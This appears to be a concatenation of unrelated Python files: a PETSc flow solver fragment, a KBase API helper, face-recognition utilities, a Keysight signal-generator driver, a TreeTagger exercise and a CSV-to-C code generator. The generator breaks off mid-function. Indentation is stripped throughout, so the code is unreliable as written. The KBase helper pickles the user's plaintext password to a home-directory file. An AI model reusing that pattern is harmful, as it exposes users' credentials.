if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
dumb_obj = creat_dumb_obj(**problem_kwargs)
dumb_comp = sf.ForceFreeComposite(center=np.zeros(3), norm=np.array((0, 0, 1)),
name='dumb_comp')
dumb_comp.add_obj(obj=dumb_obj, rel_U=np.zeros(6))
problem = sf.StrainRateBaseForceFreeProblem(**problem_kwargs)
problem.add_obj(dumb_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (1, 2, 3, 4, 5):
uw_Base_list, sumFT_Base_list = do_solve_base_flow(basei, problem, dumb_comp,
uw_Base_list, sumFT_Base_list)
return True
def main_fun_iter(**main_kwargs):
err_msg = 'main_fun_iter() is NOT finished yet. '
assert 1 == 2, err_msg
OptDB = PETSc.Options()
fileHandle = OptDB.getString('f', 'helicoid_strain_rate')
OptDB.setValue('f', fileHandle)
main_kwargs['fileHandle'] = fileHandle
field_range = np.array([[-3, -3, -3], [3, 3, 3]])
n_grid = np.array([1, 1, 1]) * OptDB.getInt('n_grid', 10)
main_kwargs['field_range'] = field_range
main_kwargs['n_grid'] = n_grid
main_kwargs['region_type'] = 'rectangle'
problem_kwargs = get_problem_kwargs(**main_kwargs)
# matrix_method = problem_kwargs['matrix_method']
# pickProblem = problem_kwargs['pickProblem']
# fileHandle = problem_kwargs['fileHandle']
# save_vtk = problem_kwargs['save_vtk']
problem_kwargs['basei'] = 1
hlx_ini_rot_theta = problem_kwargs['hlx_ini_rot_theta']
if not problem_kwargs['restart']:
print_case_info(**problem_kwargs)
tail_obj_list = create_ecoli_tail(moveh=np.zeros(3), **problem_kwargs)
tail_comp = sf.ForceFreeComposite(center=np.zeros(3), norm=np.array((0, 0, 1)),
name='tail_comp')
for tobj in tail_obj_list:
tobj.node_rotation(norm=np.array([0, 1, 0]), theta=hlx_ini_rot_theta)
tail_comp.add_obj(obj=tobj, rel_U=np.zeros(6))
problem = sf.StrainRateBaseForceFreeIterateProblem(**problem_kwargs)
problem.add_obj(tail_comp)
problem.set_iterate_comp(tail_comp)
problem.print_info()
problem.create_matrix()
uw_Base_list = []
sumFT_Base_list = []
# passive cases
for basei in (0, 1, 2, 3, 4, 5, 6, 7, 8):
uw_Base_list, sumFT_Base_list = do_solve_base_flow_iter(basei, problem, tail_comp,
uw_Base_list, sumFT_Base_list)
# active case
tail_comp.set_rel_U_list([np.zeros(6), ] * len(tail_obj_list))
basei = 9
uw_Base_list, sumFT_Base_list = do_solve_base_flow_iter(basei, problem, tail_comp,
uw_Base_list, sumFT_Base_list)
pickle_dict = {'problem_kwargs': problem_kwargs,
'u_nodes': tail_comp.get_u_nodes(),
'f_nodes': tail_comp.get_f_nodes(),
'uw_Base_list': uw_Base_list,
'sumFT_Base_list': sumFT_Base_list, }
with open('%s.pickle' % fileHandle, 'wb') as handle:
pickle.dump(pickle_dict, handle, protocol=4)
PETSc.Sys.Print('save table_data to %s.pickle' % fileHandle)
# print_single_ecoli_force_result(problem, part='tail', prefix='tran', **problem_kwargs)
return True
if __name__ == '__main__':
OptDB = PETSc.Options()
# if OptDB.getBool('main_fun_iter', False):
# OptDB.setValue('main_fun', False)
# main_fun_iter()
if OptDB.getBool('main_fun_E', False):
OptDB.setValue('main_fun', False)
main_fun_E()
if OptDB.getBool('main_fun_dumb_E', False):
OptDB.setValue('main_fun', False)
main_fun_dumb_E()
if OptDB.getBool('main_fun', True):
main_fun()
|
py | 1a34815553823bbee70095af57bade0264129849 | # kbInterface.py
"""Python module to get a KBase GenomeAnnotation interface."""
def get(ref):
import os
from doekbase.data_api.annotation.genome_annotation import api
try:
token=os.environ['KB_AUTH_TOKEN']
except KeyError:
acc=loadKbAcc()
os.environ['KB_AUTH_TOKEN']=getKbSession(acc['username'],acc['password'])
token=os.environ['KB_AUTH_TOKEN']
return api.GenomeAnnotationAPI(
token=token,
services={'workspace_service_url': 'https://kbase.us/services/ws/'},
ref=ref)
def loadKbAcc():
#import bcrypt
from subprocess import call
import pickle
from getpass import getpass
import os.path
filepath=os.path.join(os.path.expanduser('~'),".kbacc")
print("Retrieving KBase account info.\n")
try:
acc=pickle.load(open(filepath,"rb"))
except:
print("No passfile found. Enter KBase account info.\n")
username = raw_input("Username: ");
password = getpass("Password: ");
#hashed = bcrypt.hashpw(password, bcrypt.gensalt())
acc={'username': username, 'password': password}
pickle.dump(acc,open(filepath,"wb"))
call(["chmod","0600",filepath])
return acc
def getKbSession(user_id,password):
from requests import Session
import json
payload = {
'fields': 'un,token,user_id,kbase_sessionid,name',
'user_id': user_id,
'password': password,
'status': 1
}
s = Session()
log = s.post('https://kbase.us/services/authorization/Sessions/Login', data=payload)
jres = json.loads(log.text)
return jres['token']
|
py | 1a34830e15f3c7334996b247a33649c906b3e42e | from time import time
import flair
import numpy as np
import torch
from flair.models import SequenceTagger
from REL.mention_detection import MentionDetection
from REL.training_datasets import TrainingEvaluationDatasets
np.random.seed(seed=42)
MAX_SIZE_DOCS = 10
base_url = ""
wiki_version = ""
datasets = TrainingEvaluationDatasets(base_url, wiki_version).load()["aida_testB"]
docs = {}
for i, doc in enumerate(datasets):
sentences = []
for x in datasets[doc]:
if x["sentence"] not in sentences:
sentences.append(x["sentence"])
text = ". ".join([x for x in sentences])
if len(docs) == MAX_SIZE_DOCS:
print("length docs is {}.".format(len(docs)))
print("====================")
break
if len(text.split()) > 200:
docs[doc] = [text, []]
mention_detection = MentionDetection(base_url, wiki_version)
# Alternatively use Flair NER tagger.
tagger_ner = SequenceTagger.load("ner-fast")
start = time()
mentions_dataset, n_mentions = mention_detection.find_mentions(docs, tagger_ner)
print("MD took: {}".format(time() - start))
|
py | 1a348503cfaefa0e704160ceeeb24f91c7d9f43f | # -*- coding: utf-8 -*-
"""
Exercise on TreeTagger output
"""
import argparse
class Word:
""" Classe Word : définit un mot simple de la langue """
def __init__(self, form, lemma, pos):
self.form = form
self.lemma = lemma
self.pos = pos
def __repr__(self):
return f"{self.form}"
def brown_string(self):
return f"{self.form}/{self.lemma}/{self.pos}"
def is_inflected(self):
"""
        Returns True if the word is inflected
False otherwise
"""
if self.form.lower() != self.lemma:
return True
else:
return False
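# Quick illustration of is_inflected() (example values, not taken from any input file):
#   Word("chats", "chat", "NOM").is_inflected()  -> True   ("chats" differs from lemma "chat")
#   Word("chat", "chat", "NOM").is_inflected()   -> False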
def main():
    parser = argparse.ArgumentParser(description="Exercise on TreeTagger output")
parser.add_argument("-v", "--verbose", help="verbose mode", action="store_true")
parser.add_argument("file", help="le fichier tsv")
args = parser.parse_args()
words = []
with open(args.file) as tt:
for line in tt:
line = line.rstrip()
items = line.split('\t')
words.append(Word(items[0], items[2], items[1]))
res = [w for w in words if w.is_inflected() and w.pos != "PUN"]
print(res)
if __name__ == "__main__":
main() |
py | 1a348578809da714bfecb441636ef4b9f1c85ca1 | from datetime import datetime
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
plt.switch_backend('agg')
import io
from torchvision import transforms as trans
from data.data_pipe import de_preprocess
import torch
from model import l2_norm
import pdb
import cv2
from face_detection.accuracy_evaluation import predict
from face_detection.config_farm import configuration_10_320_20L_5scales_v2 as cfg
import mxnet as mx
import numpy as np
def separate_bn_paras(modules):
if not isinstance(modules, list):
modules = [*modules.modules()]
paras_only_bn = []
paras_wo_bn = []
for layer in modules:
if 'model' in str(layer.__class__):
continue
if 'container' in str(layer.__class__):
continue
else:
if 'batchnorm' in str(layer.__class__):
paras_only_bn.extend([*layer.parameters()])
else:
paras_wo_bn.extend([*layer.parameters()])
return paras_only_bn, paras_wo_bn
def prepare_facebank(conf, model, mtcnn, tta = True):
model.eval()
ctx = mx.gpu(0)
symbol_file_path = 'face_detection/symbol_farm/symbol_10_320_20L_5scales_v2_deploy.json'
model_file_path = 'face_detection/saved_model/configuration_10_320_20L_5scales_v2/train_10_320_20L_5scales_v2_iter_1800000.params'
face_detector = predict.Predict(mxnet=mx,
symbol_file_path=symbol_file_path,
model_file_path=model_file_path,
ctx=ctx,
receptive_field_list=cfg.param_receptive_field_list,
receptive_field_stride=cfg.param_receptive_field_stride,
bbox_small_list=cfg.param_bbox_small_list,
bbox_large_list=cfg.param_bbox_large_list,
receptive_field_center_start=cfg.param_receptive_field_center_start,
num_output_scales=cfg.param_num_output_scales)
embeddings = []
names = ['Unknown']
for path in conf.facebank_path.iterdir():
if path.is_file():
continue
else:
embs = []
for filename in path.iterdir():
if not filename.is_file():
continue
else:
try:
print(filename)
image = Image.open(filename)
img = image
# img = np.array(image)
# img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
# faces, infer_time = face_detector.predict(img, resize_scale=0.5, score_threshold=0.4, top_k=10000, \
# NMS_threshold=0.2, NMS_flag=True, skip_scale_branch_list=[])
# img_size = 112
# print(len(faces))
# margin = 0
# img_h, img_w, _ = np.shape(image)
# for i, bbox in enumerate(faces):
# x1, y1, x2, y2= bbox[0], bbox[1], bbox[2] ,bbox[3]
# xw1 = max(int(x1 - margin ), 0)
# yw1 = max(int(y1 - margin ), 0)
# xw2 = min(int(x2 + margin ), img_w - 1)
# yw2 = min(int(y2 + margin ), img_h - 1)
# face = cv2.resize(img[yw1:yw2 + 1, xw1:xw2 + 1], (img_size, img_size))
# # img = Image.fromarray(face[...,::-1])
# img = face
# break
except Exception as e:
print(e)
continue
if img.size != (112, 112):
img = mtcnn.align(img)
print(type(img))
# cv2.imshow('window', img)
# img.show()
# if cv2.waitKey() == ord('q'):
# break
with torch.no_grad():
if tta:
img = trans.functional.to_grayscale(img, num_output_channels=3)
mirror = trans.functional.hflip(img)
emb = model(conf.test_transform(img).to(conf.device).unsqueeze(0))
emb_mirror = model(conf.test_transform(mirror).to(conf.device).unsqueeze(0))
v_mirror = trans.functional.vflip(mirror)
v_emb_mirror = model(conf.test_transform(v_mirror).to(conf.device).unsqueeze(0))
v_img = trans.functional.vflip(img)
v_img_mirror = model(conf.test_transform(v_img).to(conf.device).unsqueeze(0))
embs.append(l2_norm(emb + emb_mirror))
# embs.append(l2_norm(emb + emb_mirror + v_emb_mirror + v_img_mirror))
# embs.append(emb)
# embs.append(emb_mirror)
# embs.append(v_emb_mirror)
# embs.append(v_img_mirror)
else:
embs.append(model(conf.test_transform(img).to(conf.device).unsqueeze(0)))
if len(embs) == 0:
continue
embedding = torch.cat(embs).mean(0,keepdim=True)
embeddings.append(embedding)
names.append(path.name)
embeddings = torch.cat(embeddings)
names = np.array(names)
torch.save(embeddings, conf.facebank_path/'facebank.pth')
np.save(conf.facebank_path/'names', names)
return embeddings, names
def load_facebank(conf):
embeddings = torch.load(conf.facebank_path/'facebank.pth')
names = np.load(conf.facebank_path/'names.npy')
return embeddings, names
def face_reader(conf, conn, flag, boxes_arr, result_arr, learner, mtcnn, targets, tta):
while True:
try:
image = conn.recv()
except:
continue
try:
bboxes, faces = mtcnn.align_multi(image, limit=conf.face_limit)
except:
bboxes = []
results = learner.infer(conf, faces, targets, tta)
if len(bboxes) > 0:
print('bboxes in reader : {}'.format(bboxes))
            bboxes = bboxes[:,:-1]  # shape: [10,4], only keep the 10 highest-possibility faces
bboxes = bboxes.astype(int)
bboxes = bboxes + [-1,-1,1,1] # personal choice
assert bboxes.shape[0] == results.shape[0],'bbox and faces number not same'
bboxes = bboxes.reshape([-1])
for i in range(len(boxes_arr)):
if i < len(bboxes):
boxes_arr[i] = bboxes[i]
else:
boxes_arr[i] = 0
for i in range(len(result_arr)):
if i < len(results):
result_arr[i] = results[i]
else:
result_arr[i] = -1
else:
for i in range(len(boxes_arr)):
boxes_arr[i] = 0 # by default,it's all 0
for i in range(len(result_arr)):
result_arr[i] = -1 # by default,it's all -1
print('boxes_arr : {}'.format(boxes_arr[:4]))
print('result_arr : {}'.format(result_arr[:4]))
flag.value = 0
hflip = trans.Compose([
de_preprocess,
trans.ToPILImage(),
trans.functional.hflip,
trans.ToTensor(),
trans.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
])
def hflip_batch(imgs_tensor):
hfliped_imgs = torch.empty_like(imgs_tensor)
for i, img_ten in enumerate(imgs_tensor):
hfliped_imgs[i] = hflip(img_ten)
return hfliped_imgs
def get_time():
return (str(datetime.now())[:-10]).replace(' ','-').replace(':','-')
def gen_plot(fpr, tpr):
"""Create a pyplot plot and save to buffer."""
plt.figure()
plt.xlabel("FPR", fontsize=14)
plt.ylabel("TPR", fontsize=14)
plt.title("ROC Curve", fontsize=14)
plot = plt.plot(fpr, tpr, linewidth=2)
buf = io.BytesIO()
plt.savefig(buf, format='jpeg')
buf.seek(0)
plt.close()
return buf
def draw_box_name(bbox,name,frame):
frame = cv2.rectangle(frame,(bbox[0],bbox[1]),(bbox[2],bbox[3]),(0,0,255),6)
frame = cv2.putText(frame,
name,
(bbox[0],bbox[1]),
cv2.FONT_HERSHEY_SIMPLEX,
2,
(0,255,0),
3,
cv2.LINE_AA)
return frame |
py | 1a348701088d22c2844fb1e68610f874db513b5f | from numpy import rad2deg, deg2rad
from qcodes import VisaInstrument, validators as vals
def parse_on_off(stat):
if stat.startswith('0'):
stat = 'Off'
elif stat.startswith('1'):
stat = 'On'
return stat
def rad2deg_mod(rad):
deg = rad2deg(float(rad))
return deg
class Keysight_E8257D(VisaInstrument):
"""
This is the qcodes driver for the Keysight_E8257D signal generator
Status: beta-version.
TODO:
- Add all parameters that are in the manual
This driver will most likely work for multiple Agilent sources.
This driver does not contain all commands available for the E8527D but
only the ones most commonly used.
"""
def __init__(self, name:str, address:str, step_attenuator:bool=False,
pulse_option:bool=True, **kwargs):
super().__init__(name, address, **kwargs)
self.add_parameter(name='frequency',
label='Frequency',
unit='Hz',
get_cmd='FREQ:CW?',
set_cmd='FREQ:CW' + ' {:.8f}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(2.5e5, 20e9))
self.add_parameter(name='phase',
label='Phase',
unit='deg',
get_cmd='PHASE?',
set_cmd='PHASE' + ' {:.8f}',
get_parser=rad2deg_mod,
set_parser=deg2rad,
vals=vals.Numbers(-180, 180))
self.add_parameter(name='power',
label='Power',
unit='dBm',
get_cmd='POW:AMPL?',
set_cmd='POW:AMPL' + ' {:.4f}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(-130, 25))
if pulse_option:
self.add_parameter(name='pulse_delay',
label='Pulse_Delay',
unit='s',
get_cmd='PULM:INT:DEL?',
set_cmd='PULM:INT:DEL' + ' {:e}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(-70e-9,42))
self.add_parameter(name='pulse_period',
label='Pulse_period',
unit='s',
get_cmd='PULM:INT:PER?',
set_cmd='PULM:INT:PER' + ' {:e}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(-70e-9, 42))
self.add_parameter(name='pulse_width',
label='Pulse_width',
unit='s',
get_cmd='PULM:INT:PWID?',
set_cmd='PULM:INT:PWID' + ' {:e}',
get_parser=float,
set_parser=float,
vals=vals.Numbers(10e-9, 42))
self.add_parameter('pulse_mod',
get_cmd='PULM:STAT?',
set_cmd='PULM:STAT' + ' {}',
get_parser=parse_on_off,
                           # Only listed the most common spellings; ideally want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.add_parameter('pulse_src',
get_cmd='PULM:SOUR?',
set_cmd='PULM:SOUR' + ' {}',
vals=vals.Enum('INT', 'EXT'))
self.add_parameter('pulse_int_mode',
get_cmd='PULM:SOUR:INT?',
set_cmd='PULM:SOUR:INT' + ' {}',
vals=vals.Enum('FRUN', 'TRIG', 'GATE'))
self.add_parameter('modulation',
get_cmd='OUTP:MOD?',
set_cmd='OUTP:MOD' + ' {}',
get_parser=parse_on_off,
                           # Only listed the most common spellings; ideally want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.add_parameter('status',
get_cmd='OUTP?',
set_cmd='OUTP' + ' {}',
get_parser=parse_on_off,
                           # Only listed the most common spellings; ideally want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.add_parameter('alc',
get_cmd='POW:ALC?',
set_cmd='POW:ALC' + ' {}',
get_parser=parse_on_off,
                           # Only listed the most common spellings; ideally want a
# .upper val for Enum or string
vals=vals.Enum('on', 'On', 'ON',
'off', 'Off', 'OFF'))
self.connect_message()
def on(self):
self.set('status', 'on')
def off(self):
self.set('status', 'off')
def mod_on(self):
self.set('modulation', 'on')
def mod_off(self):
self.set('modulation', 'off')
def alc_on(self):
self.set('alc', 'on')
def alc_off(self):
self.set('alc', 'off')
def pulse_on(self):
self.set('pulse_mod', 'on')
def pulse_off(self):
self.set('pulse_mod', 'off')
def pulse_source_int(self):
self.set('pulse_src', 'INT')
def pulse_source_ext(self):
self.set('pulse_src', 'EXT')
def pulse_int_mode_frun(self):
self.set('pulse_int_mode', 'FRUN')
def pulse_int_mode_trig(self):
self.set('pulse_int_mode', 'TRIG')
def pulse_int_mode_gate(self):
self.set('pulse_int_mode', 'GATE')
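# Minimal usage sketch (the VISA address below is a placeholder, not a real instrument):
#   sig = Keysight_E8257D('e8257d', 'TCPIP0::192.0.2.10::inst0::INSTR')
#   sig.frequency(6e9)   # set CW frequency to 6 GHz
#   sig.power(-20)       # set output power to -20 dBm
#   sig.on()             # enable RF output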
|
py | 1a348748e54a3ab1286ebb1ba6dfa2015c056887 | __version__ = '0.0.0'
default_app_config = 'celery_task_plus.apps.CeleryTaskPlusConfig'
|
py | 1a34887706988384e80a8046e52cbed6b4ea8178 | #! /usr/bin/env python3
# Script to parse spec output CSVs and produce C files.
# Released by lisa neigut under CC0:
# https://creativecommons.org/publicdomain/zero/1.0/
#
# Reads from stdin, outputs C header or body file.
#
# Standard message types:
# msgtype,<msgname>,<value>[,<option>]
# msgdata,<msgname>,<fieldname>,<typename>,[<count>][,<option>]
#
# TLV types:
# tlvtype,<tlvstreamname>,<tlvname>,<value>[,<option>]
# tlvdata,<tlvstreamname>,<tlvname>,<fieldname>,<typename>,[<count>][,<option>]
#
# Subtypes:
# subtype,<subtypename>
# subtypedata,<subtypename>,<fieldname>,<typename>,[<count>]
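# For example, a CSV fragment in the format above (values are illustrative only):
#   msgtype,init,16
#   msgdata,init,gflen,u16,
#   msgdata,init,globalfeatures,byte,gflen
# declares an 'init' message whose variable-length 'globalfeatures' field uses 'gflen'
# as its length field; the exact C output depends on the selected template/page.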
from argparse import ArgumentParser, REMAINDER
from collections import OrderedDict
import copy
import fileinput
from mako.template import Template
import os
import re
import sys
# Generator to give us one line at a time.
def next_line(args, lines):
if lines is None:
lines = fileinput.input(args)
for i, line in enumerate(lines):
yield i + 1, line.strip()
# Class definitions, to keep things classy
class Field(object):
def __init__(self, name, type_obj, extensions=[],
field_comments=[], optional=False):
self.name = name
self.type_obj = type_obj
self.count = 1
self.len_field_of = None
self.len_field = None
self.implicit_len = False
self.extension_names = extensions
self.is_optional = optional
self.field_comments = field_comments
def __deepcopy__(self, memo):
deepcopy_method = self.__deepcopy__
self.__deepcopy__ = None
field = copy.deepcopy(self, memo)
self.__deepcopy__ = deepcopy_method
field.type_obj = self.type_obj
return field
def add_count(self, count):
self.count = int(count)
def add_len_field(self, len_field):
self.count = False
# we cache our len-field's name
self.len_field = len_field.name
# the len-field caches our name
len_field.len_field_of = self.name
def add_implicit_len(self):
self.count = False
self.implicit_len = True
def is_array(self):
return self.count > 1
def is_varlen(self):
return not self.count
def is_implicit_len(self):
return self.implicit_len
def is_extension(self):
return bool(self.extension_names)
def size(self, implicit_expression=None):
if self.count:
return self.count
if self.len_field:
return self.len_field
assert self.is_implicit_len()
assert implicit_expression
return implicit_expression
def needs_context(self):
""" A field needs a context if it's varsized """
return self.is_varlen() or self.type_obj.needs_context()
def arg_desc_to(self):
if self.len_field_of:
return ''
type_name = self.type_obj.type_name()
if self.is_array():
return ', const {} {}[{}]'.format(type_name, self.name, self.count)
if self.type_obj.is_assignable() and not self.is_varlen():
name = self.name
if self.is_optional:
name = '*' + name
return ', {} {}'.format(type_name, name)
if self.is_varlen() and self.type_obj.is_varsize():
return ', const {} **{}'.format(type_name, self.name)
return ', const {} *{}'.format(type_name, self.name)
def arg_desc_from(self):
if self.len_field_of:
return ''
type_name = self.type_obj.type_name()
if self.is_array():
return ', {} {}[{}]'.format(type_name, self.name, self.count)
ptrs = '*'
if self.is_varlen() or self.is_optional or self.type_obj.is_varsize():
ptrs += '*'
if self.is_varlen() and self.type_obj.is_varsize():
ptrs += '*'
return ', {} {}{}'.format(type_name, ptrs, self.name)
class FieldSet(object):
def __init__(self):
self.fields = OrderedDict()
self.len_fields = {}
def add_data_field(self, field_name, type_obj, count=1,
extensions=[], comments=[], optional=False,
implicit_len_ok=False):
field = Field(field_name, type_obj, extensions=extensions,
field_comments=comments, optional=optional)
if bool(count):
try:
field.add_count(int(count))
except ValueError:
if count in self.fields:
len_field = self.find_data_field(count)
field.add_len_field(len_field)
self.len_fields[len_field.name] = len_field
else:
# '...' means "rest of TLV"
assert implicit_len_ok
assert count == '...'
field.add_implicit_len()
# You can't have any fields after an implicit-length field.
if len(self.fields) != 0:
assert not self.fields[next(reversed(self.fields))].is_implicit_len()
self.fields[field_name] = field
def find_data_field(self, field_name):
return self.fields[field_name]
def get_len_fields(self):
return list(self.len_fields.values())
def has_len_fields(self):
return bool(self.len_fields)
def needs_context(self):
return any([field.needs_context() or field.is_optional for field in self.fields.values()])
class Type(FieldSet):
assignables = [
'u8',
'u16',
'u32',
'u64',
'tu16',
'tu32',
'tu64',
'bool',
'amount_sat',
'amount_msat',
'bigsize',
'varint'
]
typedefs = [
'u8',
'u16',
'u32',
'u64',
'bool',
'secp256k1_ecdsa_signature',
'secp256k1_ecdsa_recoverable_signature',
'wirestring',
'double',
'bigsize',
'varint',
]
truncated_typedefs = [
'tu16',
'tu32',
'tu64',
]
# Externally defined variable size types (require a context)
varsize_types = [
'peer_features',
'gossip_getnodes_entry',
'gossip_getchannels_entry',
'failed_htlc',
'utxo',
'bitcoin_tx',
'wirestring',
'per_peer_state',
'bitcoin_tx_output',
'exclude_entry',
]
# Some BOLT types are re-typed based on their field name
# ('fieldname partial', 'original type', 'outer type'): ('true type', 'collapse array?')
name_field_map = {
('txid', 'sha256'): ('bitcoin_txid', False),
('amt', 'u64'): ('amount_msat', False),
('msat', 'u64'): ('amount_msat', False),
('satoshis', 'u64'): ('amount_sat', False),
('node_id', 'pubkey', 'channel_announcement'): ('node_id', False),
('node_id', 'pubkey', 'node_announcement'): ('node_id', False),
('temporary_channel_id', 'u8'): ('channel_id', True),
('secret', 'u8'): ('secret', True),
('preimage', 'u8'): ('preimage', True),
}
# For BOLT specified types, a few type names need to be simply 'remapped'
# 'original type': 'true type'
name_remap = {
'byte': 'u8',
'signature': 'secp256k1_ecdsa_signature',
'chain_hash': 'bitcoin_blkid',
'point': 'pubkey',
# FIXME: omits 'pad'
}
@staticmethod
def true_type(type_name, field_name=None, outer_name=None):
""" Returns 'true' type of a given type and a flag if
we've remapped a variable size/array type to a single struct
(an example of this is 'temporary_channel_id' which is specified
        as a 32*byte, but we re-map it to a channel_id)
"""
if type_name in Type.name_remap:
type_name = Type.name_remap[type_name]
if field_name:
for t, true_type in Type.name_field_map.items():
if t[0] in field_name and t[1] == type_name:
if len(t) == 2 or outer_name == t[2]:
return true_type
return (type_name, False)
def __init__(self, name):
FieldSet.__init__(self)
self.name, self.is_enum = self.parse_name(name)
self.depends_on = {}
self.type_comments = []
self.tlv = False
def parse_name(self, name):
if name.startswith('enum '):
return name[5:], True
return name, False
def add_data_field(self, field_name, type_obj, count=1,
extensions=[], comments=[], optional=False):
FieldSet.add_data_field(self, field_name, type_obj, count,
extensions=extensions,
comments=comments, optional=optional)
if type_obj.name not in self.depends_on:
self.depends_on[type_obj.name] = type_obj
def type_name(self):
if self.name in self.typedefs:
return self.name
if self.name in self.truncated_typedefs:
return self.name[1:]
if self.is_enum:
prefix = 'enum '
else:
prefix = 'struct '
return prefix + self.struct_name()
# We only accelerate the u8 case: it's common and trivial.
def has_array_helper(self):
return self.name in ['u8']
def struct_name(self):
if self.is_tlv():
return self.tlv.struct_name()
return self.name
def subtype_deps(self):
return [dep for dep in self.depends_on.values() if dep.is_subtype()]
def is_subtype(self):
return bool(self.fields)
def is_truncated(self):
return self.name in self.truncated_typedefs
def needs_context(self):
return self.is_varsize()
def is_assignable(self):
""" Generally typedef's and enums """
return self.name in self.assignables or self.is_enum
def is_varsize(self):
""" A type is variably sized if it's marked as such (in varsize_types)
or it contains a field of variable length """
return self.name in self.varsize_types or self.has_len_fields()
def add_comments(self, comments):
self.type_comments = comments
def mark_tlv(self, tlv):
self.tlv = tlv
def is_tlv(self):
return bool(self.tlv)
class Message(FieldSet):
def __init__(self, name, number, option=[], enum_prefix='wire',
struct_prefix=None, comments=[]):
FieldSet.__init__(self)
self.name = name
self.number = number
self.enum_prefix = enum_prefix
self.option = option[0] if len(option) else None
self.struct_prefix = struct_prefix
self.enumname = None
self.msg_comments = comments
def has_option(self):
return self.option is not None
def enum_name(self):
name = self.enumname if self.enumname else self.name
return "{}_{}".format(self.enum_prefix, name).upper()
def struct_name(self):
if self.struct_prefix:
return self.struct_prefix + "_" + self.name
return self.name
class Tlv(object):
def __init__(self, name):
self.name = name
self.messages = {}
def add_message(self, tokens, comments=[]):
""" tokens -> (name, value[, option]) """
self.messages[tokens[0]] = Message(tokens[0], tokens[1], option=tokens[2:],
enum_prefix=self.name,
struct_prefix=self.struct_name(),
comments=comments)
def type_name(self):
return 'struct ' + self.struct_name()
def struct_name(self):
return "tlv_{}".format(self.name)
def find_message(self, name):
return self.messages[name]
def ordered_msgs(self):
return sorted(self.messages.values(), key=lambda item: int(item.number))
class Master(object):
types = {}
tlvs = {}
messages = {}
extension_msgs = {}
inclusions = []
top_comments = []
def add_comments(self, comments):
self.top_comments += comments
def add_include(self, inclusion):
self.inclusions.append(inclusion)
def add_tlv(self, tlv_name):
if tlv_name not in self.tlvs:
self.tlvs[tlv_name] = Tlv(tlv_name)
if tlv_name not in self.types:
self.types[tlv_name] = Type(tlv_name)
return self.tlvs[tlv_name]
def add_message(self, tokens, comments=[]):
""" tokens -> (name, value[, option])"""
self.messages[tokens[0]] = Message(tokens[0], tokens[1], option=tokens[2:],
comments=comments)
def add_extension_msg(self, name, msg):
self.extension_msgs[name] = msg
def add_type(self, type_name, field_name=None, outer_name=None):
optional = False
if type_name.startswith('?'):
type_name = type_name[1:]
optional = True
# Check for special type name re-mapping
type_name, collapse_original = Type.true_type(type_name, field_name,
outer_name)
if type_name not in self.types:
self.types[type_name] = Type(type_name)
return self.types[type_name], collapse_original, optional
def find_type(self, type_name):
return self.types[type_name]
def find_message(self, msg_name):
if msg_name in self.messages:
return self.messages[msg_name]
if msg_name in self.extension_msgs:
return self.extension_msgs[msg_name]
return None
def find_tlv(self, tlv_name):
return self.tlvs[tlv_name]
def get_ordered_subtypes(self):
""" We want to order subtypes such that the 'no dependency'
types are printed first """
subtypes = [s for s in self.types.values() if s.is_subtype()]
# Start with subtypes without subtype dependencies
sorted_types = [s for s in subtypes if not len(s.subtype_deps())]
unsorted = [s for s in subtypes if len(s.subtype_deps())]
while len(unsorted):
names = [s.name for s in sorted_types]
for s in list(unsorted):
if all([dependency.name in names for dependency in s.subtype_deps()]):
sorted_types.append(s)
unsorted.remove(s)
return sorted_types
def tlv_messages(self):
return [m for tlv in self.tlvs.values() for m in tlv.messages.values()]
def find_template(self, options):
dirpath = os.path.dirname(os.path.abspath(__file__))
filename = dirpath + '/gen/{}{}_template'.format(
'print_' if options.print_wire else '', options.page)
return Template(filename=filename)
def post_process(self):
""" method to handle any 'post processing' that needs to be done.
for now, we just need match up types to TLVs """
for tlv_name, tlv in self.tlvs.items():
if tlv_name in self.types:
self.types[tlv_name].mark_tlv(tlv)
def write(self, options, output):
template = self.find_template(options)
enum_sets = []
enum_sets.append({
'name': options.enum_name,
'set': self.messages.values(),
})
stuff = {}
stuff['top_comments'] = self.top_comments
stuff['options'] = options
stuff['idem'] = re.sub(r'[^A-Z]+', '_', options.header_filename.upper())
stuff['header_filename'] = options.header_filename
stuff['includes'] = self.inclusions
stuff['enum_sets'] = enum_sets
subtypes = self.get_ordered_subtypes()
stuff['structs'] = subtypes + self.tlv_messages()
stuff['tlvs'] = self.tlvs
# We leave out extension messages in the printing pages. Any extension
# fields will get printed under the 'original' message, if present
if options.print_wire:
stuff['messages'] = list(self.messages.values())
else:
stuff['messages'] = list(self.messages.values()) + list(self.extension_msgs.values())
stuff['subtypes'] = subtypes
print(template.render(**stuff), file=output)
def main(options, args=None, output=sys.stdout, lines=None):
genline = next_line(args, lines)
comment_set = []
# Create a new 'master' that serves as the coordinator for the file generation
master = Master()
try:
while True:
ln, line = next(genline)
tokens = line.split(',')
token_type = tokens[0]
if not bool(line):
master.add_comments(comment_set)
comment_set = []
continue
if token_type == 'subtype':
subtype, _, _ = master.add_type(tokens[1])
subtype.add_comments(list(comment_set))
comment_set = []
elif token_type == 'subtypedata':
subtype = master.find_type(tokens[1])
if not subtype:
raise ValueError('Unknown subtype {} for data.\nat {}:{}'
.format(tokens[1], ln, line))
type_obj, collapse, optional = master.add_type(tokens[3], tokens[2], tokens[1])
if optional:
raise ValueError('Subtypes cannot have optional fields {}.{}\n at {}:{}'
.format(subtype.name, tokens[2], ln, line))
if collapse:
count = 1
else:
count = tokens[4]
subtype.add_data_field(tokens[2], type_obj, count, comments=list(comment_set),
optional=optional)
comment_set = []
elif token_type == 'tlvtype':
tlv = master.add_tlv(tokens[1])
tlv.add_message(tokens[2:], comments=list(comment_set))
comment_set = []
elif token_type == 'tlvdata':
type_obj, collapse, optional = master.add_type(tokens[4], tokens[3], tokens[1])
if optional:
